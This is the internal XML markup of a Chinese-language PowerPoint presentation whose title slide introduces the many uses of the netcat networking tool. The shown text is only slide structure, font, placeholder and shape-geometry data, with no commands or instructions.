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316" r:id="rId3"/>
    <p:sldId id="264" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="282" r:id="rId6"/>
    <p:sldId id="317" r:id="rId7"/>
    <p:sldId id="268" r:id="rId8"/>
    <p:sldId id="257" r:id="rId9"/>
    <p:sldId id="318" r:id="rId10"/>
    <p:sldId id="321" r:id="rId11"/>
    <p:sldId id="319" r:id="rId12"/>
    <p:sldId id="283" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="287" r:id="rId15"/>
    <p:sldId id="285" r:id="rId16"/>
    <p:sldId id="320" r:id="rId17"/>
    <p:sldId id="324" r:id="rId18"/>
    <p:sldId id="323" r:id="rId19"/>
    <p:sldId id="322" r:id="rId20"/>
    <p:sldId id="325" r:id="rId21"/>
    <p:sldId id="326" r:id="rId22"/>
    <p:sldId id="327" r:id="rId23"/>
    <p:sldId id="328" r:id="rId24"/>
    <p:sldId id="329" r:id="rId25"/>
    <p:sldId id="330" r:id="rId26"/>
    <p:sldId id="332" r:id="rId27"/>
    <p:sldId id="331" r:id="rId28"/>
    <p:sldId id="333" r:id="rId29"/>
    <p:sldId id="334" r:id="rId30"/>
    <p:sldId id="335" r:id="rId31"/>
    <p:sldId id="336" r:id="rId32"/>
    <p:sldId id="337" r:id="rId33"/>
    <p:sldId id="338" r:id="rId34"/>
    <p:sldId id="339" r:id="rId35"/>
    <p:sldId id="340" r:id="rId36"/>
    <p:sldId id="341" r:id="rId37"/>
    <p:sldId id="342" r:id="rId38"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
      <p:regular r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
      <p:italic r:id="rId47"/>
      <p:boldItalic r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" charset="0"/>
      <p:regular r:id="rId49"/>
      <p:bold r:id="rId50"/>
      <p:italic r:id="rId51"/>
      <p:boldItalic r:id="rId52"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId5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6" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="28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7FC"/>
    <a:srgbClr val="0011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8" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="-318" y="-102"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1646"/>
        <p:guide pos="2884"/>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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag24.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font11.fntdata"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font9.fntdata"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font8.fntdata"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6.fntdata"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font5.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><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 Target="slides/slide2.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.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sz="2800" baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360045" indent="467995">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="228600">
              <a:defRPr sz="2400" baseline="0"/>
            </a:lvl3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标题 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3800" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{ED5A64A4-C105-44D2-9774-5852D905C18D}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EBC0F31B-9031-47D1-8908-D00746C8C360}"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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="79000">
                <a:srgbClr val="83B6DF"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="0070C0"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:tint val="23500"/>
                  <a:satMod val="16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 name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="79000">
                <a:srgbClr val="83B6DF"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="0070C0"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:tint val="23500"/>
                  <a:satMod val="16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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197768" y="159482"/>
            <a:ext cx="8748464" cy="4824536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="190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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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t="9709" b="10037"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="627541" y="-627541"/>
            <a:ext cx="5143501" cy="6398582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:alpha val="8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219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609600" algn="l" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1219200" algn="l" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" algn="l" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2438400" algn="l" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3048000" algn="l" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3657600" algn="l" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4267200" algn="l" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4876800" algn="l" defTabSz="1219200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PA_文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420477" y="1595540"/>
            <a:ext cx="5772785" cy="783590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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zh-CN" altLang="en-US" sz="45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扫盲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="45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netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="45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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="45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N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="45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种用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="45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11" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="784938" y="2467100"/>
            <a:ext cx="4157719" cy="34289"/>
            <a:chOff x="3182554" y="3904019"/>
            <a:chExt cx="5543625" cy="45719"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="PA_矩形 11"/>
            <p:cNvSpPr/>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sz="1015" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="PA_矩形 11"/>
            <p:cNvSpPr/>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sz="1015" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="PA_矩形 11"/>
            <p:cNvSpPr/>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zh-CN" altLang="en-US" sz="1015" dirty="0">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3770948" y="2985135"/>
            <a:ext cx="277654" cy="295751"/>
            <a:chOff x="3890299" y="3865732"/>
            <a:chExt cx="307777" cy="307777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="椭圆 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3890299" y="3865732"/>
              <a:ext cx="307777" cy="3077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schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="KSO_Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3957524" y="3908275"/>
              <a:ext cx="173326" cy="222689"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 646796 w 5367"/>
                <a:gd name="T1" fmla="*/ 843536 h 6897"/>
                <a:gd name="T2" fmla="*/ 520861 w 5367"/>
                <a:gd name="T3" fmla="*/ 880824 h 6897"/>
                <a:gd name="T4" fmla="*/ 403764 w 5367"/>
                <a:gd name="T5" fmla="*/ 946285 h 6897"/>
                <a:gd name="T6" fmla="*/ 297714 w 5367"/>
                <a:gd name="T7" fmla="*/ 1036605 h 6897"/>
                <a:gd name="T8" fmla="*/ 204644 w 5367"/>
                <a:gd name="T9" fmla="*/ 1149850 h 6897"/>
                <a:gd name="T10" fmla="*/ 126487 w 5367"/>
                <a:gd name="T11" fmla="*/ 1282429 h 6897"/>
                <a:gd name="T12" fmla="*/ 65729 w 5367"/>
                <a:gd name="T13" fmla="*/ 1432134 h 6897"/>
                <a:gd name="T14" fmla="*/ 23475 w 5367"/>
                <a:gd name="T15" fmla="*/ 1595648 h 6897"/>
                <a:gd name="T16" fmla="*/ 2209 w 5367"/>
                <a:gd name="T17" fmla="*/ 1771316 h 6897"/>
                <a:gd name="T18" fmla="*/ 1481389 w 5367"/>
                <a:gd name="T19" fmla="*/ 1905000 h 6897"/>
                <a:gd name="T20" fmla="*/ 1480009 w 5367"/>
                <a:gd name="T21" fmla="*/ 1771316 h 6897"/>
                <a:gd name="T22" fmla="*/ 1459020 w 5367"/>
                <a:gd name="T23" fmla="*/ 1595648 h 6897"/>
                <a:gd name="T24" fmla="*/ 1417041 w 5367"/>
                <a:gd name="T25" fmla="*/ 1432134 h 6897"/>
                <a:gd name="T26" fmla="*/ 1355731 w 5367"/>
                <a:gd name="T27" fmla="*/ 1282429 h 6897"/>
                <a:gd name="T28" fmla="*/ 1277850 w 5367"/>
                <a:gd name="T29" fmla="*/ 1149850 h 6897"/>
                <a:gd name="T30" fmla="*/ 1184780 w 5367"/>
                <a:gd name="T31" fmla="*/ 1036605 h 6897"/>
                <a:gd name="T32" fmla="*/ 1078730 w 5367"/>
                <a:gd name="T33" fmla="*/ 946285 h 6897"/>
                <a:gd name="T34" fmla="*/ 961633 w 5367"/>
                <a:gd name="T35" fmla="*/ 880824 h 6897"/>
                <a:gd name="T36" fmla="*/ 835422 w 5367"/>
                <a:gd name="T37" fmla="*/ 843536 h 6897"/>
                <a:gd name="T38" fmla="*/ 747875 w 5367"/>
                <a:gd name="T39" fmla="*/ 731120 h 6897"/>
                <a:gd name="T40" fmla="*/ 805043 w 5367"/>
                <a:gd name="T41" fmla="*/ 726701 h 6897"/>
                <a:gd name="T42" fmla="*/ 868286 w 5367"/>
                <a:gd name="T43" fmla="*/ 711786 h 6897"/>
                <a:gd name="T44" fmla="*/ 926559 w 5367"/>
                <a:gd name="T45" fmla="*/ 686927 h 6897"/>
                <a:gd name="T46" fmla="*/ 979032 w 5367"/>
                <a:gd name="T47" fmla="*/ 653230 h 6897"/>
                <a:gd name="T48" fmla="*/ 1024876 w 5367"/>
                <a:gd name="T49" fmla="*/ 611246 h 6897"/>
                <a:gd name="T50" fmla="*/ 1063264 w 5367"/>
                <a:gd name="T51" fmla="*/ 562358 h 6897"/>
                <a:gd name="T52" fmla="*/ 1092815 w 5367"/>
                <a:gd name="T53" fmla="*/ 507945 h 6897"/>
                <a:gd name="T54" fmla="*/ 1112699 w 5367"/>
                <a:gd name="T55" fmla="*/ 448008 h 6897"/>
                <a:gd name="T56" fmla="*/ 1121813 w 5367"/>
                <a:gd name="T57" fmla="*/ 384204 h 6897"/>
                <a:gd name="T58" fmla="*/ 1120432 w 5367"/>
                <a:gd name="T59" fmla="*/ 328134 h 6897"/>
                <a:gd name="T60" fmla="*/ 1108004 w 5367"/>
                <a:gd name="T61" fmla="*/ 265711 h 6897"/>
                <a:gd name="T62" fmla="*/ 1085358 w 5367"/>
                <a:gd name="T63" fmla="*/ 207155 h 6897"/>
                <a:gd name="T64" fmla="*/ 1053322 w 5367"/>
                <a:gd name="T65" fmla="*/ 153847 h 6897"/>
                <a:gd name="T66" fmla="*/ 1012725 w 5367"/>
                <a:gd name="T67" fmla="*/ 107168 h 6897"/>
                <a:gd name="T68" fmla="*/ 964671 w 5367"/>
                <a:gd name="T69" fmla="*/ 67395 h 6897"/>
                <a:gd name="T70" fmla="*/ 910541 w 5367"/>
                <a:gd name="T71" fmla="*/ 36183 h 6897"/>
                <a:gd name="T72" fmla="*/ 850335 w 5367"/>
                <a:gd name="T73" fmla="*/ 14087 h 6897"/>
                <a:gd name="T74" fmla="*/ 786263 w 5367"/>
                <a:gd name="T75" fmla="*/ 1933 h 6897"/>
                <a:gd name="T76" fmla="*/ 728819 w 5367"/>
                <a:gd name="T77" fmla="*/ 276 h 6897"/>
                <a:gd name="T78" fmla="*/ 663366 w 5367"/>
                <a:gd name="T79" fmla="*/ 9391 h 6897"/>
                <a:gd name="T80" fmla="*/ 602332 w 5367"/>
                <a:gd name="T81" fmla="*/ 28726 h 6897"/>
                <a:gd name="T82" fmla="*/ 546545 w 5367"/>
                <a:gd name="T83" fmla="*/ 57451 h 6897"/>
                <a:gd name="T84" fmla="*/ 496282 w 5367"/>
                <a:gd name="T85" fmla="*/ 95015 h 6897"/>
                <a:gd name="T86" fmla="*/ 453751 w 5367"/>
                <a:gd name="T87" fmla="*/ 139761 h 6897"/>
                <a:gd name="T88" fmla="*/ 418954 w 5367"/>
                <a:gd name="T89" fmla="*/ 191411 h 6897"/>
                <a:gd name="T90" fmla="*/ 393546 w 5367"/>
                <a:gd name="T91" fmla="*/ 248310 h 6897"/>
                <a:gd name="T92" fmla="*/ 378356 w 5367"/>
                <a:gd name="T93" fmla="*/ 309628 h 6897"/>
                <a:gd name="T94" fmla="*/ 373938 w 5367"/>
                <a:gd name="T95" fmla="*/ 365698 h 6897"/>
                <a:gd name="T96" fmla="*/ 380013 w 5367"/>
                <a:gd name="T97" fmla="*/ 430054 h 6897"/>
                <a:gd name="T98" fmla="*/ 396584 w 5367"/>
                <a:gd name="T99" fmla="*/ 491096 h 6897"/>
                <a:gd name="T100" fmla="*/ 423372 w 5367"/>
                <a:gd name="T101" fmla="*/ 547719 h 6897"/>
                <a:gd name="T102" fmla="*/ 459551 w 5367"/>
                <a:gd name="T103" fmla="*/ 597988 h 6897"/>
                <a:gd name="T104" fmla="*/ 503186 w 5367"/>
                <a:gd name="T105" fmla="*/ 641905 h 6897"/>
                <a:gd name="T106" fmla="*/ 554278 w 5367"/>
                <a:gd name="T107" fmla="*/ 678088 h 6897"/>
                <a:gd name="T108" fmla="*/ 610894 w 5367"/>
                <a:gd name="T109" fmla="*/ 705709 h 6897"/>
                <a:gd name="T110" fmla="*/ 672756 w 5367"/>
                <a:gd name="T111" fmla="*/ 723662 h 6897"/>
                <a:gd name="T112" fmla="*/ 738209 w 5367"/>
                <a:gd name="T113" fmla="*/ 730844 h 689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5367" h="6897">
                  <a:moveTo>
                    <a:pt x="2684" y="3025"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2684" y="3025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2615" y="3026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545" y="3029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2478" y="3035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2342" y="3054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275" y="3066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2209" y="3081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2143" y="3099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077" y="3118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2013" y="3140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1949" y="3163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1886" y="3189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761" y="3247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1700" y="3279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1639" y="3313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579" y="3349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1521" y="3386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462" y="3426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1405" y="3468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348" y="3511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1293" y="3556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1237" y="3603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183" y="3651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131" y="3702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1078" y="3753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027" y="3807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="976" y="3863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927" y="3920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880" y="3978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698" y="4227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655" y="4293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613" y="4361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573" y="4429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533" y="4499"/>
                  </a:lnTo>
